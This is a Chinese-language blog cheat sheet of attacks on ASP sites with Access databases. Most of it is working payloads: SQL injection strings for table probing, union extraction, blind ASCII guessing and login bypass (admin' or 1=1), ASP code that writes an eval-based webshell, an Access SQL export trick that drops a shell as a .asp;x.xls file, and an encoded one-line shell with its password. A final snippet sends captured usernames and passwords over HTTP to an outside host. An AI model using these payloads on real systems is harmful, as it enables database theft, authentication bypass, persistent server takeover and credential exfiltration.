asp+access注入

注入

  1. and exists(select * from 表名) [查询指定表]
  2. and exists(select 字段 from 表名) [查询指定表内的字段]

联合注入

首先使用 order by x 确认字段数量 , 在使用 union select 1,x from 表名 来查看回显位.
最后使用字段名填充到回显位上,即可获取数据.
select * from admin where id = 1 and 1=2 union select 1,username,3 from admin
ascii码猜解
首先使用该语句
and (select top 1 len(字段) from 表名)=x
获取到指定字段的长度 , 然后在使用
and (select top 1 asc(mid(字段,位数,1)) from 表名)=x
来获取到指定字段第一位数据的ascii码 在递归 位数 来获取到全部数据

搜索 / 登录框 注入

搜索框一般比较常规的闭合
%' and 1=1 and '%'='%
需要注意的是 一般这种出现在搜索框的注入都是布尔型注入,最后都是通过是否搜索出数据来判断注入
所以在搜索的时候,最好搜索一个能搜索出数据的值. 保证数据库里面存在此条数据. 否则你怎么写sql语句都会返回false
同理登陆框存在注入也是一样的. 如果你能确定账号就是admin 就可以使用
admin' and 1=1 and '1'='1
否则最好使用 or 来判断
admin' or 1=1 and '1'='1

技巧

asp创建文件

<% 
Set fs = Server.CreateObject("Scripting.FileSystemObject")
File = Server.MapPath("t.asp")
Set txt = fs.CreateTextFile(File)
txt.Write chr(60)&"%eval(request(""t""))%"&chr(62)
%>

access sql导出一句话

利用条件: iis版本 < 6

create table cmd (a varchar(50)) 
insert into cmd (a) values ('xxx')
select * into [a] in 'e:\web\webshellcc\1.asp;x.xls' 'excel 4.0;' from cmd 
drop table cmd

unicode一句话

┼攠數畣整爠煥敵瑳∨≡┩愾 密码 a

asp发送http请求

<%
url = "http://www.xxxx.com//test.php?user="+user+"&pass="+pass
Dim http
Set http = Server.createobject("Msxml2.ServerXMLHTTP")
http.Open "GET", url, false
http.Send()
Set http = Nothing
%>

本文链接:

http://www.hentai6.cn/index.php/archives/41/
1 + 6 =
快来做第一个评论的人吧~